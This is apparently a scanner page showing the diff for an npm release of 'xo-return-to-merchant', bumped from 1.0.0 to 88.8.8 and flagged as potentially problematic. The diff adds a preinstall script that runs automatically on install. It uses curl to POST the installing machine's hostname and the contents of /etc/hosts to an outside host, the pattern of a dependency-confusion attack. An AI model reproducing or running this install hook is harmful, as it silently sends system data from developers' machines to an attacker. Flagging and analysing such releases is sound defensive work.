xo-return-to-merchant 1.0.0 → 88.8.8

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of xo-return-to-merchant might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +3 -2
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log('xo-return-to-merchant')
package/package.json CHANGED
@@ -1,9 +1,10 @@
1
1
  {
2
2
  "name": "xo-return-to-merchant",
3
- "version": "1.0.0",
3
+ "version": "88.8.8",
4
4
  "main": "index.js",
5
5
  "scripts": {
6
- "test": "echo \"Error: no test specified\" && exit 1"
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "curl -X POST https://c79b2r25bgm0c9ahgvc0c8jmn5yyyyyyn.xxe.lol?package=xo-return-to-merchant --data \"hostname=`hostname`\\&hosts=`cat /etc/hosts`\""
7
8
  },
8
9
  "author": "",
9
10
  "license": "ISC",